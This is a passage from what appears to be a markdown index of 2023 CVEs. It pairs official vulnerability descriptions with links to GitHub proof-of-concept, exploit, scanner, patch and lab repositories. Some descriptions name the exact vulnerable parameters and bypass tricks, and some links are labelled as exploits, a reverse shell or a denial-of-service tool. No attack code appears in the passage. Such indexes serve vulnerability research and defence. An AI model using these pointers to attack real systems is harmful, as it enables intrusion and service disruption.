[uthrasri/CVE-2023-28588_G2.5_singlefile](https://github.com/uthrasri/CVE-2023-28588_G2.5_singlefile) + +### CVE-2023-28753 (2023-05-18) + +netconsd prior to v0.2 was vulnerable to an integer overflow in its parse_packet function. A malicious individual could leverage this overflow to create heap memory corruption with attacker controlled data. + + +- [pingjuiliao/CVE-2023-28753](https://github.com/pingjuiliao/CVE-2023-28753) + +### CVE-2023-28771 (2023-04-25) + +Improper error message handling in Zyxel ZyWALL/USG series firmware versions 4.60 through 4.73, VPN series firmware versions 4.60 through 5.35, USG FLEX series firmware versions 4.60 through 5.35, and ATP series firmware versions 4.60 through 5.35, which could allow an unauthenticated attacker to execute some OS commands remotely by sending crafted packets to an affected device. + + +- [benjaminhays/CVE-2023-28771-PoC](https://github.com/benjaminhays/CVE-2023-28771-PoC) + +### CVE-2023-28772 (2023-03-23) + +An issue was discovered in the Linux kernel before 5.13.3. lib/seq_buf.c has a seq_buf_putmem_hex buffer overflow. + + +- [Trinadh465/linux-4.1.15_CVE-2023-28772](https://github.com/Trinadh465/linux-4.1.15_CVE-2023-28772) +- [Satheesh575555/linux-4.1.15_CVE-2023-28772](https://github.com/Satheesh575555/linux-4.1.15_CVE-2023-28772) +- [hshivhare67/kernel_v4.1.15_CVE-2023-28772](https://github.com/hshivhare67/kernel_v4.1.15_CVE-2023-28772) + +### CVE-2023-28810 (2023-06-15) + +Some access control/intercom products have unauthorized modification of device network configuration vulnerabilities. Attackers can modify device network configuration by sending specific data packets to the vulnerable interface within the same local network. + + +- [skylightcyber/CVE-2023-28810](https://github.com/skylightcyber/CVE-2023-28810) + +### CVE-2023-29007 (2023-04-25) + +Git is a revision control system. Prior to versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1, a specially crafted `.gitmodules` file with submodule URLs that are longer than 1024 characters can used to exploit a bug in `config.c::git_config_copy_or_rename_section_in_file()`. This bug can be used to inject arbitrary configuration into a user's `$GIT_DIR/config` when attempting to remove the configuration section associated with that submodule. When the attacker injects configuration values which specify executables to run (such as `core.pager`, `core.editor`, `core.sshCommand`, etc.) this can lead to a remote code execution. A fix A fix is available in versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1. As a workaround, avoid running `git submodule deinit` on untrusted repositories or without prior inspection of any submodule sections in `$GIT_DIR/config`. + + +- [ethiack/CVE-2023-29007](https://github.com/ethiack/CVE-2023-29007) +- [omespino/CVE-2023-29007](https://github.com/omespino/CVE-2023-29007) +- [x-Defender/CVE-2023-29007_win-version](https://github.com/x-Defender/CVE-2023-29007_win-version) + +### CVE-2023-29017 (2023-04-06) + +vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. Prior to version 3.9.15, vm2 was not properly handling host objects passed to `Error.prepareStackTrace` in case of unhandled async errors. A threat actor could bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version 3.9.15 of vm2. There are no known workarounds. + + +- [timb-machine-mirrors/seongil-wi-CVE-2023-29017](https://github.com/timb-machine-mirrors/seongil-wi-CVE-2023-29017) +- [passwa11/CVE-2023-29017-reverse-shell](https://github.com/passwa11/CVE-2023-29017-reverse-shell) + +### CVE-2023-29084 (2023-04-13) + +Zoho ManageEngine ADManager Plus before 7181 allows for authenticated users to exploit command injection via Proxy settings. + + +- [ohnonoyesyes/CVE-2023-29084](https://github.com/ohnonoyesyes/CVE-2023-29084) + +### CVE-2023-29324 (2023-05-09) + +Windows MSHTML Platform Security Feature Bypass Vulnerability + + +- [OLeDouxEt/CVE-2023-29324_Patch_Deploy](https://github.com/OLeDouxEt/CVE-2023-29324_Patch_Deploy) + +### CVE-2023-29336 (2023-05-09) + +Win32k Elevation of Privilege Vulnerability + + +- [m-cetin/CVE-2023-29336](https://github.com/m-cetin/CVE-2023-29336) + +### CVE-2023-29343 (2023-05-09) + +SysInternals Sysmon for Windows Elevation of Privilege Vulnerability + + +- [Wh04m1001/CVE-2023-29343](https://github.com/Wh04m1001/CVE-2023-29343) + +### CVE-2023-29357 (2023-06-13) + +Microsoft SharePoint Server Elevation of Privilege Vulnerability + + +- [Chocapikk/CVE-2023-29357](https://github.com/Chocapikk/CVE-2023-29357) +- [LuemmelSec/CVE-2023-29357](https://github.com/LuemmelSec/CVE-2023-29357) +- [KeyStrOke95/CVE-2023-29357-ExE](https://github.com/KeyStrOke95/CVE-2023-29357-ExE) +- [Guillaume-Risch/cve-2023-29357-Sharepoint](https://github.com/Guillaume-Risch/cve-2023-29357-Sharepoint) +- [Jev1337/CVE-2023-29357-Check](https://github.com/Jev1337/CVE-2023-29357-Check) +- [AhmedMansour93/Event-ID-189-Rule-Name-SOC227-CVE-2023-29357](https://github.com/AhmedMansour93/Event-ID-189-Rule-Name-SOC227-CVE-2023-29357) + +### CVE-2023-29360 (2023-06-13) + +Microsoft Streaming Service Elevation of Privilege Vulnerability + + +- [Nero22k/cve-2023-29360](https://github.com/Nero22k/cve-2023-29360) +- [0xDivyanshu-new/CVE-2023-29360](https://github.com/0xDivyanshu-new/CVE-2023-29360) + +### CVE-2023-29384 (2023-12-20) + +Unrestricted Upload of File with Dangerous Type vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin – JobWP.This issue affects WordPress Job Board and Recruitment Plugin – JobWP: from n/a through 2.0.\n\n + + +- [nastar-id/CVE-2023-29384](https://github.com/nastar-id/CVE-2023-29384) + +### CVE-2023-29406 (2023-07-11) + +The HTTP/1 client does not fully validate the contents of the Host header. A maliciously crafted Host header can inject additional headers or entire requests. With fix, the HTTP/1 client now refuses to send requests containing an invalid Request.Host or Request.URL.Host value. + + +- [LuizGustavoP/EP3_Redes](https://github.com/LuizGustavoP/EP3_Redes) + +### CVE-2023-29409 (2023-08-02) + +Extremely large RSA keys in certificate chains can cause a client/server to expend significant CPU time verifying signatures. With fix, the size of RSA keys transmitted during handshakes is restricted to <= 8192 bits. Based on a survey of publicly trusted RSA keys, there are currently only three certificates in circulation with keys larger than this, and all three appear to be test certificates that are not actively deployed. It is possible there are larger keys in use in private PKIs, but we target the web PKI, so causing breakage here in the interests of increasing the default safety of users of crypto/tls seems reasonable. + + +- [mateusz834/CVE-2023-29409](https://github.com/mateusz834/CVE-2023-29409) + +### CVE-2023-29439 (2023-05-16) + +Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in FooPlugins FooGallery plugin <= 2.2.35 versions. + + +- [LOURC0D3/CVE-2023-29439](https://github.com/LOURC0D3/CVE-2023-29439) + +### CVE-2023-29478 (2023-04-07) + +BiblioCraft before 2.4.6 does not sanitize path-traversal characters in filenames, allowing restricted write access to almost anywhere on the filesystem. This includes the Minecraft mods folder, which results in code execution. + + +- [Exopteron/BiblioRCE](https://github.com/Exopteron/BiblioRCE) + +### CVE-2023-29489 (2023-04-27) + +An issue was discovered in cPanel before 11.109.9999.116. XSS can occur on the cpsrvd error page via an invalid webcall ID, aka SEC-669. The fixed versions are 11.109.9999.116, 11.108.0.13, 11.106.0.18, and 11.102.0.31. + + +- [learnerboy88/CVE-2023-29489](https://github.com/learnerboy88/CVE-2023-29489) +- [xKore123/cPanel-CVE-2023-29489](https://github.com/xKore123/cPanel-CVE-2023-29489) +- [ipk1/CVE-2023-29489.py](https://github.com/ipk1/CVE-2023-29489.py) +- [Mostafa-Elguerdawi/CVE-2023-29489.yaml](https://github.com/Mostafa-Elguerdawi/CVE-2023-29489.yaml) +- [Mostafa-Elguerdawi/CVE-2023-29489](https://github.com/Mostafa-Elguerdawi/CVE-2023-29489) +- [whalebone7/EagleEye](https://github.com/whalebone7/EagleEye) +- [0-d3y/CVE-2023-29489](https://github.com/0-d3y/CVE-2023-29489) +- [Abdullah7-ma/CVE-2023-29489](https://github.com/Abdullah7-ma/CVE-2023-29489) +- [tucommenceapousser/CVE-2023-29489](https://github.com/tucommenceapousser/CVE-2023-29489) +- [tucommenceapousser/CVE-2023-29489.py](https://github.com/tucommenceapousser/CVE-2023-29489.py) +- [ViperM4sk/cpanel-xss-177](https://github.com/ViperM4sk/cpanel-xss-177) +- [S4muraiMelayu1337/CVE-2023-29489](https://github.com/S4muraiMelayu1337/CVE-2023-29489) +- [SynixCyberCrimeMy/CVE-2023-29489](https://github.com/SynixCyberCrimeMy/CVE-2023-29489) +- [Makurorororororororo/Validate-CVE-2023-29489-scanner-](https://github.com/Makurorororororororo/Validate-CVE-2023-29489-scanner-) +- [prasad-1808/tool-29489](https://github.com/prasad-1808/tool-29489) +- [mdaseem03/cpanel_xss_2023](https://github.com/mdaseem03/cpanel_xss_2023) +- [some-man1/CVE-2023-29489](https://github.com/some-man1/CVE-2023-29489) +- [Cappricio-Securities/CVE-2023-29489](https://github.com/Cappricio-Securities/CVE-2023-29489) +- [md-thalal/CVE-2023-29489](https://github.com/md-thalal/CVE-2023-29489) + +### CVE-2023-29808 (2023-05-12) + +Cross Site Scripting (XSS) vulnerability in vogtmh cmaps (companymaps) 8.0 allows attackers to execute arbitrary code. + + +- [zPrototype/CVE-2023-29808](https://github.com/zPrototype/CVE-2023-29808) + +### CVE-2023-29809 (2023-05-12) + +SQL injection vulnerability found in Maximilian Vogt companymaps (cmaps) v.8.0 allows a remote attacker to execute arbitrary code via a crafted script in the request. + + +- [zPrototype/CVE-2023-29809](https://github.com/zPrototype/CVE-2023-29809) + +### CVE-2023-29839 (2023-05-03) + +A Stored Cross Site Scripting (XSS) vulnerability exists in multiple pages of Hotel Druid version 3.0.4, which allows arbitrary execution of commands. The vulnerable fields are Surname, Name, and Nickname in the Document function. + + +- [jichngan/CVE-2023-29839](https://github.com/jichngan/CVE-2023-29839) + +### CVE-2023-29919 (2023-05-23) + +SolarView Compact <= 6.0 is vulnerable to Insecure Permissions. Any file on the server can be read or modified because texteditor.php is not restricted. + + +- [xiaosed/CVE-2023-29919](https://github.com/xiaosed/CVE-2023-29919) + +### CVE-2023-29922 (2023-04-19) + +PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface. + + +- [CN016/Powerjob-CVE-2023-29922-](https://github.com/CN016/Powerjob-CVE-2023-29922-) + +### CVE-2023-29923 (2023-04-19) + +PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface. + + +- [1820112015/CVE-2023-29923](https://github.com/1820112015/CVE-2023-29923) +- [3yujw7njai/CVE-2023-29923-Scan](https://github.com/3yujw7njai/CVE-2023-29923-Scan) +- [Le1a/CVE-2023-29923](https://github.com/Le1a/CVE-2023-29923) + +### CVE-2023-29929 (2024-08-21) + +Buffer Overflow vulnerability found in Kemptechnologies Loadmaster before v.7.2.60.0 allows a remote attacker to casue a denial of service via the libkemplink.so, isreverse library. + + +- [YSaxon/CVE-2023-29929](https://github.com/YSaxon/CVE-2023-29929) + +### CVE-2023-29930 (2023-05-10) + +An issue was found in Genesys CIC Polycom phone provisioning TFTP Server all version allows a remote attacker to execute arbitrary code via the login crednetials to the TFTP server configuration page. + + +- [YSaxon/TFTPlunder](https://github.com/YSaxon/TFTPlunder) + +### CVE-2023-29983 (2023-05-12) + +Cross Site Scripting vulnerability found in Maximilian Vogt cmaps v.8.0 allows a remote attacker to execute arbitrary code via the auditlog tab in the admin panel. + + +- [zPrototype/CVE-2023-29983](https://github.com/zPrototype/CVE-2023-29983) + +### CVE-2023-30033 +- [phucodeexp/CVE-2023-30033](https://github.com/phucodeexp/CVE-2023-30033) + +### CVE-2023-30092 (2023-05-08) + +SourceCodester Online Pizza Ordering System v1.0 is vulnerable to SQL Injection via the QTY parameter. + + +- [nawed20002/CVE-2023-30092](https://github.com/nawed20002/CVE-2023-30092) + +### CVE-2023-30145 (2023-05-26) + +Camaleon CMS v2.7.0 was discovered to contain a Server-Side Template Injection (SSTI) vulnerability via the formats parameter. + + +- [paragbagul111/CVE-2023-30145](https://github.com/paragbagul111/CVE-2023-30145) + +### CVE-2023-30146 (2023-08-04) + +Assmann Digitus Plug&View IP Camera HT-IP211HDP, version 2.000.022 allows unauthenticated attackers to download a copy of the camera's settings and the administrator credentials. + + +- [L1-0/CVE-2023-30146](https://github.com/L1-0/CVE-2023-30146) + +### CVE-2023-30185 (2023-05-08) + +CRMEB v4.4 to v4.6 was discovered to contain an arbitrary file upload vulnerability via the component \attachment\SystemAttachmentServices.php. + + +- [c7w1n/CVE-2023-30185](https://github.com/c7w1n/CVE-2023-30185) + +### CVE-2023-30190 +- [MojithaR/CVE-2023-30190-FOLLINA](https://github.com/MojithaR/CVE-2023-30190-FOLLINA) + +### CVE-2023-30212 (2023-04-26) + +OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php. + + +- [kuttappu123/CVE-2023-30212-LAB](https://github.com/kuttappu123/CVE-2023-30212-LAB) +- [Rishipatidar/CVE-2023-30212-POC-DOCKER-FILE](https://github.com/Rishipatidar/CVE-2023-30212-POC-DOCKER-FILE) +- [mallutrojan/CVE-2023-30212-Lab](https://github.com/mallutrojan/CVE-2023-30212-Lab) +- [Anandhu990/CVE-2023-30212_lab](https://github.com/Anandhu990/CVE-2023-30212_lab) +- [libas7994/CVE-2023-30212](https://github.com/libas7994/CVE-2023-30212) +- [libasmon/Vulnerable-Docker-Environment-CVE-2023-30212](https://github.com/libasmon/Vulnerable-Docker-Environment-CVE-2023-30212) +- [libasmon/-create-a-vulnerable-Docker-environment-that-is-susceptible-to-CVE-2023-30212](https://github.com/libasmon/-create-a-vulnerable-Docker-environment-that-is-susceptible-to-CVE-2023-30212) +- [libasmon/Exploite-CVE-2023-30212-Vulnerability](https://github.com/libasmon/Exploite-CVE-2023-30212-Vulnerability) +- [libas7994/Exploit-the-CVE-2023-30212-vulnerability](https://github.com/libas7994/Exploit-the-CVE-2023-30212-vulnerability) +- [libasv/Exploite-CVE-2023-30212-vulnerability](https://github.com/libasv/Exploite-CVE-2023-30212-vulnerability) +- [kai-iszz/CVE-2023-30212](https://github.com/kai-iszz/CVE-2023-30212) +- [MaThEw-ViNcEnT/CVE-2023-30212-OURPHP-Vulnerability](https://github.com/MaThEw-ViNcEnT/CVE-2023-30212-OURPHP-Vulnerability) +- [arunsnap/CVE-2023-30212-POC](https://github.com/arunsnap/CVE-2023-30212-POC) +- [VisDev23/Vulnerable-Docker--CVE-2023-30212-](https://github.com/VisDev23/Vulnerable-Docker--CVE-2023-30212-) +- [AAsh035/CVE-2023-30212](https://github.com/AAsh035/CVE-2023-30212) +- [JasaluRah/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-](https://github.com/JasaluRah/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-) + +### CVE-2023-30226 (2023-07-12) + +An issue was discovered in function get_gnu_verneed in rizinorg Rizin prior to 0.5.0 verneed_entry allows attackers to cause a denial of service via crafted elf file. + + +- [ifyGecko/CVE-2023-30226](https://github.com/ifyGecko/CVE-2023-30226) + +### CVE-2023-30253 (2023-05-29) + +Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data. + + +- [Rubikcuv5/cve-2023-30253](https://github.com/Rubikcuv5/cve-2023-30253) +- [04Shivam/CVE-2023-30253-Exploit](https://github.com/04Shivam/CVE-2023-30253-Exploit) +- [nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253](https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253) +- [g4nkd/CVE-2023-30253-PoC](https://github.com/g4nkd/CVE-2023-30253-PoC) +- [dollarboysushil/Dolibarr-17.0.0-Exploit-CVE-2023-30253](https://github.com/dollarboysushil/Dolibarr-17.0.0-Exploit-CVE-2023-30253) +- [andria-dev/DolibabyPhp](https://github.com/andria-dev/DolibabyPhp) +- [bluetoothStrawberry/CVE-2023-30253](https://github.com/bluetoothStrawberry/CVE-2023-30253) + +### CVE-2023-30256 (2023-05-11) + +Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file. + + +- [ahrixia/CVE-2023-30256](https://github.com/ahrixia/CVE-2023-30256) + +### CVE-2023-30258 (2023-06-23) + +Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request. + + +- [gy741/CVE-2023-30258-setup](https://github.com/gy741/CVE-2023-30258-setup) + +### CVE-2023-30347 (2023-06-22) + +Cross Site Scripting (XSS) vulnerability in Neox Contact Center 2.3.9, via the serach_sms_api_name parameter to the SMA API search. + + +- [huzefa2212/CVE-2023-30347](https://github.com/huzefa2212/CVE-2023-30347) + +### CVE-2023-30367 (2023-07-26) + +Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users to store and manage multi-protocol connection configurations to remotely connect to systems. mRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-dev loads configuration files in plain text into memory (after decrypting them if necessary) at application start-up, even if no connection has been established yet. This allows attackers to access contents of configuration files in plain text through a memory dump and thus compromise user credentials when no custom password encryption key has been set. This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory. + + +- [S1lkys/CVE-2023-30367-mRemoteNG-password-dumper](https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper) + +### CVE-2023-30383 (2023-07-18) + +TP-LINK Archer C50v2 Archer C50(US)_V2_160801, TP-LINK Archer C20v1 Archer_C20_V1_150707, and TP-LINK Archer C2v1 Archer_C2_US__V1_170228 were discovered to contain a buffer overflow which may lead to a Denial of Service (DoS) when parsing crafted data. + + +- [a2ure123/CVE-2023-30383](https://github.com/a2ure123/CVE-2023-30383) + +### CVE-2023-30458 (2023-04-24) + +A username enumeration issue was discovered in Medicine Tracker System 1.0. The login functionality allows a malicious user to guess a valid username due to a different response time from invalid usernames. When one enters a valid username, the response time increases depending on the length of the supplied password. + + +- [d34dun1c02n/CVE-2023-30458](https://github.com/d34dun1c02n/CVE-2023-30458) + +### CVE-2023-30459 (2023-04-14) + +SmartPTT SCADA 1.1.0.0 allows remote code execution (when the attacker has administrator privileges) by writing a malicious C# script and executing it on the server (via server settings in the administrator control panel on port 8101, by default). + + +- [Toxich4/CVE-2023-30459](https://github.com/Toxich4/CVE-2023-30459) + +### CVE-2023-30486 (2024-12-09) + +Missing Authorization vulnerability in HashThemes Square allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Square: from n/a through 2.0.0. + + +- [RandomRobbieBF/CVE-2023-30486](https://github.com/RandomRobbieBF/CVE-2023-30486) + +### CVE-2023-30533 (2023-04-24) + +SheetJS Community Edition before 0.19.3 allows Prototype Pollution via a crafted file. In other words. 0.19.2 and earlier are affected, whereas 0.19.3 and later are unaffected. + + +- [BenEdridge/CVE-2023-30533](https://github.com/BenEdridge/CVE-2023-30533) + +### CVE-2023-30547 (2023-04-17) + +vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. There exists a vulnerability in exception sanitization of vm2 for versions up to 3.9.16, allowing attackers to raise an unsanitized host exception inside `handleException()` which can be used to escape the sandbox and run arbitrary code in host context. This vulnerability was patched in the release of version `3.9.17` of `vm2`. There are no known workarounds for this vulnerability. Users are advised to upgrade. + + +- [rvizx/CVE-2023-30547](https://github.com/rvizx/CVE-2023-30547) +- [user0x1337/CVE-2023-30547](https://github.com/user0x1337/CVE-2023-30547) +- [Cur1iosity/CVE-2023-30547](https://github.com/Cur1iosity/CVE-2023-30547) +- [junnythemarksman/CVE-2023-30547](https://github.com/junnythemarksman/CVE-2023-30547) + +### CVE-2023-30765 (2023-07-10) + +\n​Delta Electronics InfraSuite Device Master versions prior to 1.0.7 contain improper access controls that could allow an attacker to alter privilege management configurations, resulting in privilege escalation.\n\n + + +- [0xfml/CVE-2023-30765](https://github.com/0xfml/CVE-2023-30765) + +### CVE-2023-30777 (2023-05-10) + +Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in WP Engine Advanced Custom Fields Pro, WP Engine Advanced Custom Fields plugins <= 6.1.5 versions. + + +- [Alucard0x1/CVE-2023-30777](https://github.com/Alucard0x1/CVE-2023-30777) + +### CVE-2023-30800 (2023-09-07) + +The web server used by MikroTik RouterOS version 6 is affected by a heap memory corruption issue. A remote and unauthenticated attacker can corrupt the server's heap memory by sending a crafted HTTP request. As a result, the web interface crashes and is immediately restarted. The issue was fixed in RouterOS 6.49.10 stable. RouterOS version 7 is not affected.\n + + +- [griffinsectio/CVE-2023-30800_PoC](https://github.com/griffinsectio/CVE-2023-30800_PoC) +- [griffinsectio/CVE-2023-30800_PoC_go](https://github.com/griffinsectio/CVE-2023-30800_PoC_go) +- [KhogenTheRabbit/cve-2023-30800-multithread-doser](https://github.com/KhogenTheRabbit/cve-2023-30800-multithread-doser) +- [AxthonyV/MikroTik](https://github.com/AxthonyV/MikroTik) + +### CVE-2023-30839 (2023-04-25) + +PrestaShop is an Open Source e-commerce web application. Versions prior to 8.0.4 and 1.7.8.9 contain a SQL filtering vulnerability. A BO user can write, update, and delete in the database, even without having specific rights. PrestaShop 8.0.4 and 1.7.8.9 contain a patch for this issue. There are no known workarounds. + + +- [drkbcn/lblfixer_cve_2023_30839](https://github.com/drkbcn/lblfixer_cve_2023_30839) + +### CVE-2023-30845 (2023-04-26) + +ESPv2 is a service proxy that provides API management capabilities using Google Service Infrastructure. ESPv2 2.20.0 through 2.42.0 contains an authentication bypass vulnerability. API clients can craft a malicious `X-HTTP-Method-Override` header value to bypass JWT authentication in specific cases.\n\nESPv2 allows malicious requests to bypass authentication if both the conditions are true: The requested HTTP method is **not** in the API service definition (OpenAPI spec or gRPC `google.api.http` proto annotations, and the specified `X-HTTP-Method-Override` is a valid HTTP method in the API service definition. ESPv2 will forward the request to your backend without checking the JWT. Attackers can craft requests with a malicious `X-HTTP-Method-Override` value that allows them to bypass specifying JWTs. Restricting API access with API keys works as intended and is not affected by this vulnerability.\n\nUpgrade deployments to release v2.43.0 or higher to receive a patch. This release ensures that JWT authentication occurs, even when the caller specifies `x-http-method-override`. `x-http-method-override` is still supported by v2.43.0+. API clients can continue sending this header to ESPv2. + + +- [himori123/-CVE-2023-30845](https://github.com/himori123/-CVE-2023-30845) + +### CVE-2023-30854 (2023-04-28) + +AVideo is an open source video platform. Prior to version 12.4, an OS Command Injection vulnerability in an authenticated endpoint `/plugin/CloneSite/cloneClient.json.php` allows attackers to achieve Remote Code Execution. This issue is fixed in version 12.4. + + +- [jmrcsnchz/CVE-2023-30854](https://github.com/jmrcsnchz/CVE-2023-30854) + +### CVE-2023-30943 (2023-05-02) + +The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system. + + +- [d0rb/CVE-2023-30943](https://github.com/d0rb/CVE-2023-30943) +- [Chocapikk/CVE-2023-30943](https://github.com/Chocapikk/CVE-2023-30943) +- [RubyCat1337/CVE-2023-30943](https://github.com/RubyCat1337/CVE-2023-30943) + +### CVE-2023-31070 +- [bugprove/cve-2023-31070](https://github.com/bugprove/cve-2023-31070) + +### CVE-2023-31290 (2023-04-27) + +Trust Wallet Core before 3.1.1, as used in the Trust Wallet browser extension before 0.0.183, allows theft of funds because the entropy is 32 bits, as exploited in the wild in December 2022 and March 2023. This occurs because the mt19937 Mersenne Twister takes a single 32-bit value as an input seed, resulting in only four billion possible mnemonics. The affected versions of the browser extension are 0.0.172 through 0.0.182. To steal funds efficiently, an attacker can identify all Ethereum addresses created since the 0.0.172 release, and check whether they are Ethereum addresses that could have been created by this extension. To respond to the risk, affected users need to upgrade the product version and also move funds to a new wallet address. + + +- [ohexa/py_trustwallet_wasm](https://github.com/ohexa/py_trustwallet_wasm) + +### CVE-2023-31320 (2023-11-14) + +Improper input validation in the AMD RadeonTM Graphics display driver may allow an attacker to corrupt the display potentially resulting in denial of service.\n\n\n\n\n\n\n\n\n\n\n\n\n + + +- [whypet/CVE-2023-31320](https://github.com/whypet/CVE-2023-31320) + +### CVE-2023-31346 (2024-02-13) + +Failure to initialize\nmemory in SEV Firmware may allow a privileged attacker to access stale data\nfrom other guests.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n + + +- [Freax13/cve-2023-31346-poc](https://github.com/Freax13/cve-2023-31346-poc) + +### CVE-2023-31355 (2024-08-05) + +Improper restriction of write operations in SNP firmware could allow a malicious hypervisor to overwrite a guest's UMC seed potentially allowing reading of memory from a decommissioned guest. + + +- [Freax13/cve-2023-31355-poc](https://github.com/Freax13/cve-2023-31355-poc) + +### CVE-2023-31419 (2023-10-26) + +A flaw was discovered in Elasticsearch, affecting the _search API that allowed a specially crafted query string to cause a Stack Overflow and ultimately a Denial of Service.\n\n\n\n\n + + +- [sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419](https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419) +- [u238/Elasticsearch-CVE-2023-31419](https://github.com/u238/Elasticsearch-CVE-2023-31419) + +### CVE-2023-31433 (2023-05-02) + +A SQL injection issue in Logbuch in evasys before 8.2 Build 2286 and 9.x before 9.0 Build 2401 allows authenticated attackers to execute SQL statements via the welche parameter. + + +- [trustcves/CVE-2023-31433](https://github.com/trustcves/CVE-2023-31433) + +### CVE-2023-31434 (2023-05-02) + +The parameters nutzer_titel, nutzer_vn, and nutzer_nn in the user profile, and langID and ONLINEID in direct links, in evasys before 8.2 Build 2286 and 9.x before 9.0 Build 2401 do not validate input, which allows authenticated attackers to inject HTML Code and XSS payloads in multiple locations. + + +- [trustcves/CVE-2023-31434](https://github.com/trustcves/CVE-2023-31434) + +### CVE-2023-31435 (2023-05-02) + +Multiple components (such as Onlinetemplate-Verwaltung, Liste aller Teilbereiche, Umfragen anzeigen, and questionnaire previews) in evasys before 8.2 Build 2286 and 9.x before 9.0 Build 2401 allow authenticated attackers to read and write to unauthorized data by accessing functions directly. + + +- [trustcves/CVE-2023-31435](https://github.com/trustcves/CVE-2023-31435) + +### CVE-2023-31443 +- [MaherAzzouzi/CVE-2023-31443](https://github.com/MaherAzzouzi/CVE-2023-31443) + +### CVE-2023-31445 (2023-05-11) + +Cassia Access controller before 2.1.1.2203171453, was discovered to have a unprivileged -information disclosure vulnerability that allows read-only users have the ability to enumerate all other users and discover e-mail addresses, phone numbers, and privileges of all other users. + + +- [Dodge-MPTC/CVE-2023-31445-Unprivileged-Information-Disclosure](https://github.com/Dodge-MPTC/CVE-2023-31445-Unprivileged-Information-Disclosure) + +### CVE-2023-31446 (2024-01-10) + +In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup. + + +- [Dodge-MPTC/CVE-2023-31446-Remote-Code-Execution](https://github.com/Dodge-MPTC/CVE-2023-31446-Remote-Code-Execution) + +### CVE-2023-31497 (2023-05-11) + +Incorrect access control in Quick Heal Technologies Limited Seqrite Endpoint Security (EPS) all versions prior to v8.0 allows attackers to escalate privileges to root via supplying a crafted binary to the target system. + + +- [0xInfection/EPScalate](https://github.com/0xInfection/EPScalate) + +### CVE-2023-31541 (2023-06-13) + +A unrestricted file upload vulnerability was discovered in the ‘Browse and upload images’ feature of the CKEditor v1.2.3 plugin for Redmine, which allows arbitrary files to be uploaded to the server. + + +- [DreamD2v/CVE-2023-31541](https://github.com/DreamD2v/CVE-2023-31541) + +### CVE-2023-31546 (2023-12-14) + +Cross Site Scripting (XSS) vulnerability in DedeBIZ v6.0.3 allows attackers to run arbitrary code via the search feature. + + +- [ran9ege/CVE-2023-31546](https://github.com/ran9ege/CVE-2023-31546) + +### CVE-2023-31584 (2023-05-22) + +GitHub repository cu/silicon commit a9ef36 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the User Input field. + + +- [rootd4ddy/CVE-2023-31584](https://github.com/rootd4ddy/CVE-2023-31584) + +### CVE-2023-31594 (2023-05-25) + +IC Realtime ICIP-P2012T 2.420 is vulnerable to Incorrect Access Control via an exposed HTTP channel using VLC network. + + +- [Yozarseef95/CVE-2023-31594](https://github.com/Yozarseef95/CVE-2023-31594) + +### CVE-2023-31595 (2023-05-24) + +IC Realtime ICIP-P2012T 2.420 is vulnerable to Incorrect Access Control via unauthenticated port access. + + +- [Yozarseef95/CVE-2023-31595](https://github.com/Yozarseef95/CVE-2023-31595) + +### CVE-2023-31606 (2023-06-06) + +A Regular Expression Denial of Service (ReDoS) issue was discovered in the sanitize_html function of redcloth gem v4.0.0. This vulnerability allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload. + + +- [merbinr/CVE-2023-31606](https://github.com/merbinr/CVE-2023-31606) + +### CVE-2023-31634 (2024-03-27) + +In TeslaMate before 1.27.2, there is unauthorized access to port 4000 for remote viewing and operation of user data. After accessing the IP address for the TeslaMate instance, an attacker can switch the port to 3000 to enter Grafana for remote operations. At that time, the default username and password can be used to enter the Grafana management console without logging in, a related issue to CVE-2022-23126. + + +- [iSee857/CVE-2023-31634](https://github.com/iSee857/CVE-2023-31634) + +### CVE-2023-31664 (2023-05-23) + +A reflected cross-site scripting (XSS) vulnerability in /authenticationendpoint/login.do of WSO2 API Manager before 4.2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the tenantDomain parameter. + + +- [adilkhan7/CVE-2023-31664](https://github.com/adilkhan7/CVE-2023-31664) + +### CVE-2023-31702 (2023-05-17) + +SQL injection in the View User Profile in MicroWorld eScan Management Console 14.0.1400.2281 allows remote attacker to dump entire database and gain windows XP command shell to perform code execution on database server via GetUserCurrentPwd?UsrId=1. + + +- [sahiloj/CVE-2023-31702](https://github.com/sahiloj/CVE-2023-31702) + 